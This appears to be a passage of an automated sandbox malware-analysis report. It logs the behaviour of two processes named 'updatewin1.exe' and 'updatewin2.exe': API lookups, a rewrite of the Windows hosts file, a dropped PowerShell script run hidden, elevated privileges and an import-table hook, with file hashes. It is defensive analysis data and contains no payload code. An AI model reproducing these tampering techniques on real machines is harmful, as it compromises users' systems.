Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-27 16:55:50 (UTC) True 2
Fn
Get Time type = Ticks, time = 109325 True 1
Fn
Get Time type = Performance Ctr, time = 16785487002 True 1
Fn
Get Time type = Ticks, time = 109372 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 16821802868 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #7: updatewin2.exe
654 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:00:49, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x78c
Parent PID 0x714 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 5D0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin2.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
buffer 0x005D5000 0x005D5FFF Marked Executable - 32-bit - False False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax
False
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Fn
Data
Module (135)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-27 16:55:50 (UTC) True 1
Fn
Get Time type = Ticks, time = 109715 True 1
Fn
Get Time type = Performance Ctr, time = 16824525742 True 1
Fn
Get Time type = Ticks, time = 109762 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 1627-02-27 16:55:51 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 16876507701 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #8: updatewin1.exe
670 0
»
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\
Monitor Start Time: 00:00:48, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:20
OS Process Information
»
Information Value
PID 0x7fc
Parent PID 0x7a8 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 358
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x002B5000 0x002B5FFF Marked Executable - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002a0000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000007f0000:+0x77f6f6
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 49 bytes MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl
False
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Fn
Data
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create powershell os_pid = 0x330, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (150)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
